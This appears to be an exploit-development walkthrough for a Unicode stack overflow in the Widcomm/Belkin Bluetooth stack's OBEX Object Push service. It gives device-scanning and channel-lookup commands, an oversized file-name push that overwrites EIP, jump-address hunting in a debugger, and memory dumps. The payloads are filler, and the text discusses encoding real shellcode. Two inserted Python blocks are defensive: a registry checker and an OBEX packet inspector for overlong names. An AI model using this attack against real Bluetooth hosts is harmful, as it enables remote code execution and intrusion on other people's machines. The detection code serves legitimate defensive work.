Widcomm 1.42 win32 bluetooth driver exploit made public by pentest.co.uk ?

These memory offsets are for the Belkin Bluetooth Software 1.4.2 Build 10. By default the local service "PIM Item Transfer" is set to Auto Startup with Secure Connection Not Required.

Scan for a vulnerable device:

    animosity:~/ussp-push-0.2# hcitool scan
    Scanning ...
            00:0A:3A:54:71:95       THREAT-WIN32

Locate the service channel:

    animosity:~/ussp-push-0.2# sdptool search OPUSH 00:0A:3A:54:71:95
    Inquiring ...
    Searching for OPUSH on 00:0A:3A:54:71:95 ...
    Service Name: PIM Item Transfer
    Service RecHandle: 0x10007
    Service Class ID List:
      "OBEX Object Push" (0x1105)
    Protocol Descriptor List:
      "L2CAP" (0x0100)
      "RFCOMM" (0x0003)
        Channel: 3
      "OBEX" (0x0008)
    Language Base Attr List:
      code_ISO639: 0x656e
      encoding:    0x6a
      base_offset: 0x100
    Profile Descriptor List:
      "OBEX Object Push" (0x1105)
        Version: 0x0100

Break out the modified obextool:

    animosity:~/ussp-push-0.2# ./obextool
    Bluetooth OBEX tool
    Usage: obextool [options]
    Options:
      -i [hciX|bdaddr]   Local HCI device or BD Address
      -h, --help         Display help
    Commands:
      push [channel]     Push a file

Stuff some test shellcode into a file. This buffer is limited to 300-some-odd bytes:

    animosity:~/ussp-push-0.2# echo `perl -e 'print "Z" x 230'` > shellcode

More test shellcode goes in the local device name, which is limited to 248 chars. Do not make this name too long or you will crash BTTray.exe:

    animosity:~/ussp-push-0.2# hciconfig hci0 name `perl -e 'print "B" x 100'`
    animosity:~/ussp-push-0.2# hciconfig hci0 name
    hci0:   Type: USB
            BD Address: 00:10:7A:5D:49:4E ACL MTU: 192:8  SCO MTU: 64:8
            Name: 'BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB'

Upon connection to the remote machine a registry key will be added under HKEY_LOCAL_MACHINE\SOFTWARE\Widcomm\BTConfig\Devices\; the entry will contain the above device name. The Devices key is something you will want to keep clean as you develop your exploit.
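The Devices key just described is also a forensic artifact: every peer that connected leaves its Bluetooth name behind, so a filler name like the 100 'B's above survives in the registry of the target. The checker below is an added example, not code from the original post. It parses a .reg export of HKEY_LOCAL_MACHINE\SOFTWARE\Widcomm\BTConfig\Devices and flags cached names that are runs of a repeated character, longer than the 248-byte device-name limit the post quotes, or not printable ASCII. The value name "Name", the per-device subkey naming and the sample export are assumptions; the post does not give the key's layout.

```python
"""
Added example (not from the original post): flag suspicious cached peer
names in a .reg export of the Widcomm Devices key. The "Name" value and
the BD-address-style subkey names below are assumed, not taken from the post.
"""
import re

DEVICES_KEY = r"HKEY_LOCAL_MACHINE\SOFTWARE\Widcomm\BTConfig\Devices"
DEVICE_NAME_MAX = 248   # device-name limit quoted in the post
FILLER_MIN_LEN = 32     # this many chars drawn from 1-2 distinct values is padding

# Constructed sample export: one ordinary headset and one peer whose cached
# name is 100 'B's, as the hciconfig example above would leave behind.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Widcomm\BTConfig\Devices\00107a5d494e]
"Name"="''' + "B" * 100 + r'''"
"Class"=dword:00100104

[HKEY_LOCAL_MACHINE\SOFTWARE\Widcomm\BTConfig\Devices\000a3a547195]
"Name"=hex(1):48,00,65,00,61,00,64,00,73,00,65,00,\
  74,00,00,00
'''


def _unescape_reg_string(s):
    """REG_SZ literals escape backslash and double quote with a backslash."""
    return re.sub(r"\\(.)", r"\1", s)


def _decode_hex1(payload):
    """hex(1) is a REG_SZ written as comma-separated UTF-16LE bytes."""
    raw = bytes(int(b, 16) for b in payload.split(",") if b.strip())
    return raw.decode("utf-16-le", errors="replace").split("\x00", 1)[0]


def parse_reg_export(text):
    """Return {subkey: {value_name: text}} for string values under DEVICES_KEY."""
    text = text.replace("\\\r\n", "").replace("\\\n", "")  # join hex continuation lines
    result, current = {}, None
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            path = line[1:-1]
            current = path if path.lower().startswith(DEVICES_KEY.lower() + "\\") else None
            if current is not None:
                result[current] = {}
            continue
        if current is None or not line.startswith('"'):
            continue
        m = re.match(r'"((?:[^"\\]|\\.)*)"=(.*)$', line)
        if not m:
            continue
        vname, vdata = _unescape_reg_string(m.group(1)), m.group(2).strip()
        if len(vdata) >= 2 and vdata.startswith('"') and vdata.endswith('"'):
            result[current][vname] = _unescape_reg_string(vdata[1:-1])
        elif vdata.startswith("hex(1):"):
            result[current][vname] = _decode_hex1(vdata[len("hex(1):"):])
    return result


def inspect_device_names(reg_text):
    """Return [(subkey, message), ...]; an empty list means nothing stood out."""
    findings = []
    for subkey, values in parse_reg_export(reg_text).items():
        name = values.get("Name")
        if name is None:
            continue
        if len(name.encode("utf-8", errors="replace")) > DEVICE_NAME_MAX:
            findings.append((subkey, "cached name exceeds the %d-byte limit" % DEVICE_NAME_MAX))
        if len(name) >= FILLER_MIN_LEN and len(set(name)) <= 2:
            findings.append((subkey, "cached name is %d chars of filler starting %r"
                             % (len(name), name[:8])))
        if any(ord(c) < 0x20 or ord(c) > 0x7E for c in name):
            findings.append((subkey, "cached name contains non-printable characters"))
    return findings


if __name__ == "__main__":
    for subkey, msg in inspect_device_names(SAMPLE_REG):
        print(subkey.rsplit("\\", 1)[-1], msg)
```

Run it against `reg export "HKLM\SOFTWARE\Widcomm\BTConfig\Devices" devices.reg` output from a machine under investigation; the headset entry stays quiet, the 100-'B' entry is reported.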
If you make use of the device name for shellcode it will be cached by the Stack Server. Reboots and registry flushes can become a routine event if you use this buffer.

Attach Olly to BTSTAC~1 (BTW Stack Server) on the box you are attacking. With this version / vendor package the length to overflow is 187 bytes:

    animosity:~/ussp-push-0.2# ./obextool push shellcode 00:0A:3A:54:71:95 `perl -e 'print "A" x 187'` 3
    Sending object ... (hang)

This will cause EIP and EBP to be overwritten with 0x00410041. Unicode overflows == pain in the ass.

Break out OllyUni.dll 0.10, compliments of FX and Phenoelit. Skylined, I appreciate you mentioning this to me btw.

    Address  Message
    OllyUni plugin v0.10 (Unicode/RetDiff/Filter/SPret)
    Copyright (C) 2003,2004, FX of Phenoelit
    disabling trace points
    File 'C:\PROGRA~1\Belkin\BLUETO~1\BTSTAC~1.EXE'
    ...
    00410041 Illegal instruction
    Running Unicode analysis from 0x004100AA (thread 1992)
    0 previous results deleted
    36916 directly addressable sections found, 7261 usable, 0 filtered
    00140076 CALL reg found! (CALL ECX)
    00140076 Address found, 100.00% chance to reach it
    ...
    00F000B7 JMP reg found! (JMP ECX)
    00F000B7 Address found, 100.00% chance to reach it
    ...
    00F2000B JMP reg found! (JMP ECX)
    00F20008 Address found, 100.00% chance to reach it
    ...
    00F2000B JMP reg found! (JMP ECX)
    00F20009 Address found, 100.00% chance to reach it
    ...
    00F2000B JMP reg found! (JMP ECX)
    00F2000A Address found, 100.00% chance to reach it
    ...
    00F2000B JMP reg found! (JMP ECX)
    00F2000B Address found, 100.00% chance to reach it
    ...
    00F20037 CALL reg found! (CALL ECX)
    00F20037 Address found, 100.00% chance to reach it
    ...
    00F8019B CALL reg found! (CALL ECX)
    00F80192 Address found, 100.00% chance to reach it
    ...
    00F9010B JMP reg found! (JMP ECX)
    00F900A4 Address found, 50.00% chance to reach it
    ...
    00FB00FF CALL reg found! (CALL ECX)
    00FB00F9 Address found, 50.00% chance to reach it
    ...
    00FB00FF CALL reg found! (CALL ECX)
    00FB00FB Address found, 50.00% chance to reach it
    ...
    00FB00FF CALL reg found! (CALL ECX)
    00FB00FD Address found, 50.00% chance to reach it
    ...
    00FB00FF CALL reg found! (CALL ECX)
    00FB00FF Address found, 100.00% chance to reach it
    ...
    00FD003F JMP reg found! (JMP ECX)
    00FD003F Address found, 100.00% chance to reach it
    ...
    00FD00C7 JMP reg found! (JMP ECX)
    00FD00C7 Address found, 100.00% chance to reach it
    ...
    00FE00FB CALL reg found! (CALL ECX)
    00FE00FB Address found, 100.00% chance to reach it
    ...
    00FE00FF CALL reg found! (CALL ECX)
    00FE00FE Address found, 100.00% chance to reach it
    ...
    00FE00FF CALL reg found! (CALL ECX)
    00FE00FF Address found, 100.00% chance to reach it

We are kinda fucked with regards to space for Unicode shellcode. So let's just do the jmp and see what we have to work with. We only have 185 bytes in the file name buffer. (Can we place more code after EIP safely?)

    animosity:~/ussp-push-0.2# ./obextool push shellcode 00:0A:3A:54:71:95 `perl -e 'print "A" x 185 . "\xFE\xFF"'` 3
    Sending object ...

We chose the jump at 0x00fe00ff and set a breakpoint on it in Olly just to see what's going on. Olly pauses on the memory access. Click play and we should crash on an ADD BYTE PTR DS:[EAX],AL, aka 0x0000. The crash is at 0x0053C82C, which is the instruction right after the Unicode string that was in ECX. Just before this instruction was ADD BYTE PTR DS:[ECX],AL (aka 0x004100) followed by INC ECX (aka 0x41). Immediately after that would logically be our return address, in this case a jump into ECX: INC DWORD PTR DS:[EAX] (0xFF00) and INC BYTE PTR DS:[EAX] (0xFE00). This means we successfully jumped into ECX and executed some code. The Unicode string starts at 0x0053C71D: UNICODE "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"... You have 185 bytes to make the magic happen.

The memory layout, which includes the file name, looks like this after the attack:

    0053C443 ................................................................
    0053C483 .........................................C.:.\.D.o.c.u.m.e.n.t.
    0053C4C3 s. .a.n.d. .S.e.t.t.i.n.g.s.\.A.d.m.i.n.i.s.t.r.a.t.o.r.\.M.y. .
    0053C503 D.o.c.u.m.e.n.t.s.\.B.l.u.e.t.o.o.t.h. .E.x.c.h.a.n.g.e. .F.o.l.
    0053C543 d.e.r.\.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.
    0053C583 A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.
    0053C5C3 A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.
    0053C603 A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.
    0053C643 A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.
    0053C683 A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.7.A.A.....
    0053C6C3 A7x7x7x7x7x7x7x7x7x7x7x7x7x7x7x7x7x7x7x7x7x7x7x7x7x7x7x7x7x7x7x7
    0053C703 x7x7x7x7x7x7x7x7x7x7x7x7x7A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.
    0053C743 A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.
    0053C783 A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.
    0053C7C3 A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.
    0053C803 A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.A.........................
    0053C843 ................................................................

The Bluetooth name of the connecting device is also visible in memory at the time:

    0053D4E4 ......................................?.......K.....z]IN
    0053D524 BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
    0053D564 BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB............................
    0053D5A4 ................................................................

The contents of the file that you transferred can also be seen:

    0057F75C W..................................................UU.....
    0057F79C ZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ
    0057F7DC ZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ
    0057F81C ZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ
    0057F85C ZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ..........................
    0057F89C ................UUW.......................................
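The trigger for everything above is a single OBEX PUT whose Name header is long enough to run past the file-name buffer, so the cheapest place to catch it on the wire (or in a fuzz/regression harness for the stack) is the Name header itself. The inspector below is an added example, not code from the original post or the Widcomm package. It parses the OBEX header list, decodes the Name header (null-terminated UTF-16BE per the OBEX spec) and flags names at or past the 187-character overflow length the post measured, unusually long names, and repeated-character filler. The thresholds come from the post; the packet encoder and both sample packets are constructed here purely as test input.

```python
"""
Added example (not from the original post): inspect OBEX Object Push PUT
requests for Name headers sized to hit the file-name overflow. The wire
format follows the OBEX spec; thresholds are the figures given in the post.
"""
import string

OBEX_PUT = 0x02            # PUT without the final bit
OBEX_PUT_FINAL = 0x82      # PUT with the final bit set
HI_NAME = 0x01             # Name: null-terminated UTF-16BE text
HI_TYPE = 0x42             # Type: byte sequence
HI_LENGTH = 0xC3           # Length: 4-byte quantity
HI_END_OF_BODY = 0x49      # End-of-Body: byte sequence

NAME_OVERFLOW_LEN = 187    # characters the post needed to clobber EBP/EIP
NAME_SUSPECT_LEN = 128     # longer than any sane pushed file name
SAFE_NAME_CHARS = set(string.ascii_letters + string.digits + " ._-()")


def _hdr(hi, value):
    """Encode one length-prefixed header; the length counts its 3 header bytes."""
    return bytes([hi]) + (len(value) + 3).to_bytes(2, "big") + value


def build_put_request(name, body, mime_type=b"text/plain"):
    """Constructed encoder, used only to produce sample input for inspect_put()."""
    headers = _hdr(HI_NAME, name.encode("utf-16-be") + b"\x00\x00")
    headers += _hdr(HI_TYPE, mime_type + b"\x00")
    headers += bytes([HI_LENGTH]) + len(body).to_bytes(4, "big")
    headers += _hdr(HI_END_OF_BODY, body)
    return bytes([OBEX_PUT_FINAL]) + (len(headers) + 3).to_bytes(2, "big") + headers


def parse_obex_headers(packet):
    """Return (opcode, [(header_id, raw_value), ...]); raise on malformed input.

    The top two bits of a header id select its encoding: 00 Unicode text and
    01 byte sequence carry a 16-bit length; 10 is a 1-byte, 11 a 4-byte value.
    """
    if len(packet) < 3:
        raise ValueError("truncated OBEX packet")
    opcode, total_len = packet[0], int.from_bytes(packet[1:3], "big")
    if total_len != len(packet):
        raise ValueError("OBEX length %d does not match %d bytes" % (total_len, len(packet)))
    headers, pos = [], 3
    while pos < len(packet):
        hi, kind = packet[pos], packet[pos] >> 6
        if kind in (0, 1):
            if pos + 3 > len(packet):
                raise ValueError("truncated header at offset %d" % pos)
            hlen = int.from_bytes(packet[pos + 1:pos + 3], "big")
            if hlen < 3 or pos + hlen > len(packet):
                raise ValueError("bad header length %d at offset %d" % (hlen, pos))
            value, pos = packet[pos + 3:pos + hlen], pos + hlen
        else:
            size = 1 if kind == 2 else 4
            if pos + 1 + size > len(packet):
                raise ValueError("truncated header at offset %d" % pos)
            value, pos = packet[pos + 1:pos + 1 + size], pos + 1 + size
        headers.append((hi, value))
    return opcode, headers


def decode_name(raw):
    """Decode a Name header value, dropping the UTF-16 terminator if present."""
    if raw.endswith(b"\x00\x00"):
        raw = raw[:-2]
    return raw.decode("utf-16-be", errors="replace")


def inspect_put(packet):
    """Return [(severity, message), ...] for one OBEX request; empty means clean."""
    findings = []
    opcode, headers = parse_obex_headers(packet)
    if opcode not in (OBEX_PUT, OBEX_PUT_FINAL):
        return findings
    for hi, raw in headers:
        if hi != HI_NAME:
            continue
        name = decode_name(raw)
        if len(name) >= NAME_OVERFLOW_LEN:
            findings.append(("high", "Name is %d chars, at or past the %d-char overflow length"
                             % (len(name), NAME_OVERFLOW_LEN)))
        elif len(name) > NAME_SUSPECT_LEN:
            findings.append(("medium", "Name is %d chars, unusually long for a pushed object" % len(name)))
        if len(name) >= 32 and len(set(name)) <= 2:
            findings.append(("medium", "Name is a run of repeated characters (filler pattern)"))
        odd = "".join(sorted({c for c in name if c not in SAFE_NAME_CHARS}))
        if odd:
            findings.append(("medium", "Name contains unexpected characters: %r" % odd[:16]))
    return findings


# Constructed samples: a normal vCard push and a push carrying a 187-char name.
BENIGN_PUT = build_put_request("contact.vcf", b"BEGIN:VCARD\r\nEND:VCARD\r\n", b"text/x-vCard")
OVERSIZED_PUT = build_put_request("A" * 187, b"Z" * 230)

if __name__ == "__main__":
    for label, pkt in (("benign", BENIGN_PUT), ("oversized", OVERSIZED_PUT)):
        print(label, inspect_put(pkt) or "clean")
```

In practice the packets would come from an RFCOMM capture on the OPUSH channel (channel 3 in the sdptool output above) rather than from the constructed encoder; the length checks sit on the decoded character count because the stack widens the name to UTF-16, which is exactly why the post's 187 single-byte characters turn into the 0x00410041 overwrite.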
Keep in mind that 2 of the buffers are ASCII based. This could help loads! Skylined's alpha2 code or FX's vene.pl will obviously need to be used. Can we encode a short relative jump or a three-byte near jump?